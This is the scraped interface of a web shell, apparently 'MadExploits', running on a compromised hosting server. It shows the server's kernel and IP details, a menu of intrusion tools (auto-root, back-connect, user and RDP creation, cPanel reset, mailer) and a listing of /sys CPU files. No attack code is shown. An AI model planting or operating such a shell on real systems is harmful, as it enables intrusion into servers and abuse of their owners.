Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.117.168.71
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
sys /
devices /
system /
cpu /
[ HOME SHELL ]
Name
Size
Permission
Action
cpu0
[ DIR ]
drwxr-xr-x
cpu1
[ DIR ]
drwxr-xr-x
cpu2
[ DIR ]
drwxr-xr-x
cpu3
[ DIR ]
drwxr-xr-x
cpu4
[ DIR ]
drwxr-xr-x
cpu5
[ DIR ]
drwxr-xr-x
cpu6
[ DIR ]
drwxr-xr-x
cpu7
[ DIR ]
drwxr-xr-x
cpuidle
[ DIR ]
drwxr-xr-x
power
[ DIR ]
drwxr-xr-x
smt
[ DIR ]
drwxr-xr-x
vulnerabilities
[ DIR ]
drwxr-xr-x
isolated
4
KB
-r--r--r--
kernel_max
4
KB
-r--r--r--
modalias
4
KB
-r--r--r--
nohz_full
4
KB
-r--r--r--
offline
4
KB
-r--r--r--
online
4
KB
-r--r--r--
possible
4
KB
-r--r--r--
present
4
KB
-r--r--r--
uevent
4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modalias
x86cpu:vendor:0002:family:0017:model:0031:feature:,0000,0001,0002,0003,0004,0005,0006,0007,0008,0009,000B,000C,000D,000E,000F,0010,0011,0013,0017,0018,0019,001A,0020,0021,0022,0023,0024,0025,0026,0027,0028,0029,002B,002C,002D,002E,002F,0030,0031,0034,0036,0037,0038,0039,003A,003B,003D,0064,006A,006E,0070,0072,0074,007A,007D,0080,0081,0089,008C,008D,0093,0094,0095,0096,0097,0098,0099,009A,009B,009C,009D,009E,009F,00C0,00C1,00C4,00C5,00C6,00C7,00C8,00C9,00D6,00D7,00F0,00F1,00F3,00F6,00F9,00FA,00FB,00FC,010F,0120,0121,0123,0125,0127,0128,0132,0133,0134,0137,0138,013D,0140,0141,0142,016E,016F,01A0,01A2,01A9,01AC,01AE,01AF,01B8,01C2,0202,0216,025A,025B,025D,025F
Close